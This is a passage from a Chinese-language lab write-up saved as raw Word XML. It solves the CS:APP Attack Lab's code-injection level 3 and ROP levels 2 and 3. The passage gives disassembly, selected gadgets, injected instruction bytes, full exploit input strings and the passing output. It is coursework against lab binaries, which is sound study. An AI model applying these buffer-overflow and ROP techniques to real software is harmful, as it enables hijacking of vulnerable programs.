bc 28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$0x28,%r12d</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1e48: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64 49 8b 04 24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%fs:(%r12),%rax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1e4d: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48 89 44 24 78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%rax,0x78(%rsp)</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1e52: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31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xor    %eax,%eax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1e54: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f7 f4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1350 &lt;random@plt&gt;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1e59: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c1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%rax,%rcx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1e5c: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ba 0b d7 a3 70 3d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movabs $0xa3d70a3d70a3d70b,%rdx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1e63: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0a d7 a3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1e66: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f7 ea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imul   %rdx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1e69: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01 ca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add    %rcx,%rdx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1e6c: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c1 fa 06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sar    $0x6,%rdx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1e70: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c8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%rcx,%rax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1e73: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c1 f8 3f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sar    $0x3f,%rax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1e77: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29 c2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sub    %rax,%rdx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1e7a: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04 92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(%rdx,%rdx,4),%rax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1e7e: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04 80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(%rax,%rax,4),%rax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1e82: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c1 e0 02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shl    $0x2,%rax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1e86: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29 c1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sub    %rax,%rcx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1e89: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4c 8d 2c 0c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(%rsp,%rcx,1),%r13</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1e8d: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41 89 e8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%ebp,%r8d</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1e90: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0d 16 24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0x2416(%rip),%rcx        # 42ad &lt;_IO_stdin_used+0x2ad&gt;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1e97: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c7 c2 ff ff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$0xffffffffffffffff,%rdx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1e9e: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be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$0x1,%esi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1ea3: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4c 89 ef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%r13,%rdi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1ea6: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00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$0x0,%eax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1eab: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50 f5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1400 &lt;__sprintf_chk@plt&gt;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1eb0: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ba 09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$0x9,%edx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1eb5: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4c 89 ee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%r13,%rsi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1eb8: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89 df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%rbx,%rdi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1ebb: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90 f3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1250 &lt;strncmp@plt&gt;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1ec0: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85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test   %eax,%eax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1ec2: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0f 94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sete   %al</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1ec5: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8b 5c 24 78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0x78(%rsp),%rbx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1eca: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64 49 33 1c 24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xor    %fs:(%r12),%rbx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1ecf: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75 11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jne    1ee2 &lt;hexmatch+0xb6&gt;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1ed1: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0f b6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movzbl %al,%eax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1ed4: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81 c4 88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add    $0x88,%rsp</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1edb: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5b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pop    %rbx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1edc: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5d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pop    %rbp</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1edd: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41 5c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pop    %r12</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1edf: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41 5d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pop    %r13</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1ee1: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1ee2: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e8 a9 f3 ff ff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call   1290 &lt;__stack_chk_fail@plt&gt;</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hexmatch 还调用了 strncmp 。这两个函数都会将数据进栈，如果我把数据放到 getbuf 的栈空间，有可能会被覆盖掉，所以我把数据放到 test 的栈空间里。先 GDB 查看一下 test 的栈顶地址，是 0x55679738 。使用 man ascii 命令，查看 cookie 的十六进制表示，37 34 37 63 39 63 35 65 ，因为字符串结尾要有字符串结束符，所以要在最后加 00 。将 test 的栈顶地址存到寄存器 %rdi 中，再将 touch3 的地址压栈。写成汇编代码就是 movq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$0x55679738,%rdi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movq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$0x555555555ee7,%rdx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pushq</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ret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编译查看反汇编代码。</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in.o：     文件格式 elf64-x86-64</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Disassembly of section .text:</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0000000000000000 &lt;.text&gt;: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c7 c7 38 97 67 55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$0x55679738,%rdi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ba e7 5e 55 55 55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movabs $0x555555555ee7,%rdx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">   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55 00 00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52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push   %rdx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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>得到反汇编代码  48 c7 c7 38 97 67 55 48 ba e7 5e 55 55 55 55 00 00 52 c3 。先填充 注入代码地址，再用 0 填满 bufsize ，最后是返回栈顶地址和 cookie 的十六进制字符串。</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所以最后的输入是：</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48 c7 c7 38 97 67 55 48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ba e7 5e 55 55 55 55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52 c3 00 00 00 00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00 00 00 00 00 00 00 00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f8 96 67 55 00 00 00 00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37 34 37 63 39 63 35 65 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">00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利用 cat re.txt | ./hex2raw | ./ctarget 运行一下</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Cookie: 0x747c9c5e</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Type string:Touch3!: You called touch3("747c9c5e")</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Valid solution for level 3 with target ctarget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PASS: Sent exploit string to server to be validated.</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NICE JOB!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>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30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Part II：Return-Oriented Programming</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="4799330"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="3" name="图片 3" descr="166714400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67144004841"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267960" cy="4799330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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反汇编 rtarget ，ogjdump -d rtarget &gt; rtarget.txt </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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Farm的反汇编代码</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0000000000001f8c &lt;start_farm&gt;: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1f8c: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1f90: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1f95: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0000000000001f96 &lt;addval_314&gt;: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1f96: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1f9a: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51 36 58 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-0x3ca7c9af(%rdi),%eax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1fa0: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0000000000001fa1 &lt;setval_245&gt;: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1fa1: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1fa5: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58 c1 cc 82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$0x82ccc158,(%rdi)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1fab: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0000000000001fac &lt;addval_246&gt;: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1fac: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1fb0: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48 89 c7 94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-0x6b3876b8(%rdi),%eax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1fb6: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0000000000001fb7 &lt;addval_110&gt;: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1fb7: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1fbb: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58 90 c3 42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0x42c39058(%rdi),%eax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1fc1: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0000000000001fc2 &lt;setval_181&gt;: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1fc2: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1fc6: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48 89 c7 94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$0x94c78948,(%rdi)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1fcc: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0000000000001fcd &lt;getval_451&gt;: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1fcd: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1fd1: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50 90 90 90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$0x90909050,%eax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1fd6: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0000000000001fd7 &lt;getval_412&gt;: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1fd7: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1fdb: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48 89 c7 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$0xc3c78948,%eax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1fe0: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0000000000001fe1 &lt;getval_487&gt;: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1fe1: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1fe5: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8f 48 89 c7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$0xc789488f,%eax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1fea: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0000000000001feb &lt;mid_farm&gt;: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1feb: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1fef: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1ff4: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0000000000001ff5 &lt;add_xy&gt;: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1ff5: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1ff9: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48 8d 04 37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(%rdi,%rsi,1),%rax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1ffd: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0000000000001ffe &lt;getval_491&gt;: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1ffe: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2002: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81 ce 38 d2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$0xd238ce81,%eax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2007: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0000000000002008 &lt;addval_238&gt;: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2008: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200c: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89 ce 92 90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-0x6f6d3177(%rdi),%eax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2012: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0000000000002013 &lt;setval_182&gt;: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2013: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2017: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89 c2 30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$0xc030c289,(%rdi)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201d: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000000000000201e &lt;setval_391&gt;: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201e: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2022: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89 d1 38 db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$0xdb38d189,(%rdi)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2028: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0000000000002029 &lt;setval_398&gt;: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2029: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202d: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a9 c2 38 d2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$0xd238c2a9,(%rdi)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2033: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0000000000002034 &lt;getval_498&gt;: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2034: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2038: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48 89 e0 91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$0x91e08948,%eax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203d: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000000000000203e &lt;addval_118&gt;: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203e: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2042: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c9 c2 c3 25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0x25c3c2c9(%rdi),%eax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2048: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0000000000002049 &lt;getval_228&gt;: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2049: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204d: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89 ce 38 c9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$0xc938ce89,%eax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2052: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0000000000002053 &lt;getval_476&gt;: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2053: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2057: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89 d1 c7 cb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$0xcbc7d189,%eax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205c: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000000000000205d &lt;setval_474&gt;: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205d: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2061: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a9 c2 20 db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$0xdb20c2a9,(%rdi)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2067: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0000000000002068 &lt;setval_187&gt;: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2068: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206c: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48 89 e0 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$0xc3e08948,(%rdi)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2072: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0000000000002073 &lt;addval_446&gt;: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2073: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2077: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48 8d e0 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-0x3c1f72b8(%rdi),%eax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207d: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000000000000207e &lt;getval_490&gt;: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207e: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2082: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09 ce 84 d2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$0xd284ce09,%eax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2087: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0000000000002088 &lt;setval_423&gt;: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2088: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208c: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89 c2 38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$0xc038c289,(%rdi)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2092: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0000000000002093 &lt;getval_172&gt;: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2093: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2097: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48 09 e0 90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$0x90e00948,%eax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209c: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000000000000209d &lt;getval_189&gt;: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209d:</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20a1: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55 09 d1 90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$0x90d10955,%eax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20a6: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00000000000020a7 &lt;setval_144&gt;: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20a7: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20ab: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81 ce 08 db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$0xdb08ce81,(%rdi)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20b1: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00000000000020b2 &lt;getval_404&gt;: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20b2:</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20b6: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89 ce 94 d2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$0xd294ce89,%eax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20bb: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00000000000020bc &lt;addval_184&gt;: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20bc:</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20c0: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48 89 e0 c1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-0x3e1f76b8(%rdi),%eax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20c6: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00000000000020c7 &lt;getval_388&gt;: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20c7:</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20cb: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a9 d1 90 90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$0x9090d1a9,%eax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20d0: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00000000000020d1 &lt;getval_151&gt;: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20d1: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20d5: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89 d1 18 c9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$0xc918d189,%eax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20da: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00000000000020db &lt;addval_370&gt;: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20db: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20df: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81 d1 20 c9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-0x36df2e7f(%rdi),%eax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20e5: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00000000000020e6 &lt;setval_207&gt;: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20e6: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20ea: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48 89 e0 91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$0x91e08948,(%rdi)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20f0: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00000000000020f1 &lt;getval_226&gt;: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20f1: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20f5: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89 ce 78 d2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$0xd278ce89,%eax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20fa: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00000000000020fb &lt;setval_477&gt;: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20fb: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20ff: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89 ce 20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$0xc020ce89,(%rdi)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2105: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0000000000002106 &lt;addval_316&gt;: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2106:</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210a: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89 c2 30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-0x3fcf3d77(%rdi),%eax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2110:</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0000000000002111 &lt;getval_307&gt;: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2111:</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2115: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89 d1 48 d2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$0xd248d189,%eax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211a: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000000000000211b &lt;getval_171&gt;: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211b:</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211f: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89 d1 38 c0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$0xc038d189,%eax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2124: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0000000000002125 &lt;getval_216&gt;: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2125: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2129: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96 09 c2 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$0xc3c20996,%eax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212e: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000000000000212f &lt;setval_244&gt;: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212f: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2133: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c7 07 48 89 e0 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movl   $0xc3e08948,(%rdi)</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2139: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000000000000213a &lt;addval_284&gt;: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213a:</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213e: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8d 87 1e ba 89 c2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lea    -0x3d7645e2(%rdi),%eax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2144:</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0000000000002145 &lt;getval_223&gt;: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2145:</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2149:</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e5 08 89 e0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$0xe08908e5,%eax</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214e:</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rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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000000000000214f &lt;end_farm&gt;:</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214f:</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f3 0f 1e fa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endbr64 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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 xml:space="preserve">    2153:</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b8 01 00 00 00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mov    $0x1,%eax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>2158:</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c3                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret    </w:t>
      </w:r>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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>level 2</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同 touch2 ，我们需要将 cookie 存到寄存器中，并把 touch2 的地址进栈。在 farm 中找不到 pop %rdi,所以等效地找了一个 popq 和 movq 指令，我找到符合要求的是：58 popq %rax 和 48 89 c7 movq %rax %rdi</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0000000000001f96 &lt;addval_314&gt;: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1f96:</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1f9a:</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8d 87 51 36 58 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lea    -0x3ca7c9af(%rdi),%eax</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1fa0:</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ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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0000000000001fe1 &lt;getval_487&gt;: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1fe1:</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1fe5:</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b8 8f 48 89 c7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mov    $0xc789488f,%eax</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1fea:</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ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480" w:leftChars="200" w:firstLine="0" w:firstLineChars="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其地址分别为 0x55 55 55 55 5f 9e 和 0x55 55 55 55 5f e7    所以输入数据为，填满 getbuf 的 56</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 个 00 ，加上  popq %rax 的反汇编代码，然后是  cookie 的值，接着是 movq %rax %rdi ,最后是 touch2 的地址。</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所以最后的输入是：</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9e 5f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5e 9c 7c 74 00 00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e7 5f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c2 5d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利用 cat re.txt | ./hex2raw | ./rtarget 运行一下</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Cookie: 0x747c9c5e</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Type string:Touch2!: You called touch2(0x747c9c5e)</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Valid solution for level 2 with target rtarget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PASS: Sent exploit string to server to be validated.</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NICE JOB!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>level 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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同touch3，，我们需要将 cookie 存到寄存器中，并把 touch3 的地址进栈。因为开启了栈随机化，所以不能直接把代码插入到绝对地址，必须找一个基准，我们就只能找%rsp。因为touch3会开辟一个很大的buffsize，若把数据插到touch3下面的栈空间，有关内存之后基本就会被重写，所以要存在touch3的更高地址处。所以要在%rsp上加一个bias才可以，即字符串地址是%rsp + bias。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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没有直接的加法指令，找两个寄存器互相加。即，把%rsp里的栈指针地址放到%rdi，拿到bias的值放到%rsi，利用add xy，把栈指针地址和bias加起来放到%rax，再传到%rdi。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="240" w:hanging="240" w:hangingChars="10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我找到符合要求的是：48 89 e0 movq %rsp,%rax 、 48 89 c7 movq %rax %rdi  、58 popq %rax 和 89 c2 movl %eax,%edx 、  89 d1 movl %edx,%ecx 、 89 ce movl %ecx,%esi 、&lt;add xy&gt;  lea (%rdi,%rsi,1),%rax 、 48 89 c7 movq %rax,%rdi 。</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movq %rsp,%rax </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movq %rax %rdi  //取栈顶地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="240" w:hanging="240" w:hangingChars="10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popq %rax</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0x48            //取偏移量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="240" w:hanging="240" w:hangingChars="10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movl %eax,%edx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="240" w:hanging="240" w:hangingChars="10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movl %edx,%ecx</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movl %ecx,%esi    //准备</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lea (%rdi,%rsi,1),%rax  //计算cookie地址</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movq %rax,%rdi     //传入cookie地址</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Touch3</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Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="240" w:hanging="240" w:hangingChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>要注意，getbuf执行ret后相当于进行了一次pop操作，test的栈顶指针%rsp=%rsp+0x8，所以cookie相对于此时栈顶指针的偏移量是0x48而不是0x50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">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0000000000002068 &lt;setval_187&gt;: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2068:</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206c:</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c7 07 48 89 e0 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movl   $0xc3e08948,(%rdi)</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2072:</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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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000000000000213a &lt;addval_284&gt;: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213a:</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213e:</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8d 87 1e ba 89 c2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lea    -0x3d7645e2(%rdi),%eax</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2144:</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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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000000000000201e &lt;setval_391&gt;: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201e:</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2022:</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c7 07 89 d1 38 db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movl   $0xdb38d189,(%rdi)</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2028:</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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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0000000000002049 &lt;getval_228&gt;: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2049:</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204d:</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b8 89 ce 38 c9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mov    $0xc938ce89,%eax</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2052:</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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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0000000000001ff5 &lt;add_xy&gt;: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1ff5:</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1ff9:</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48 8d 04 37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lea    (%rdi,%rsi,1),%rax</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1ffd:</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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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0000000000001fe1 &lt;getval_487&gt;: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1fe1:</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f3 0f 1e fa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endbr64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1fe5:</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b8 8f 48 89 c7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mov    $0xc789488f,%eax</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    1fea:</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c3                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
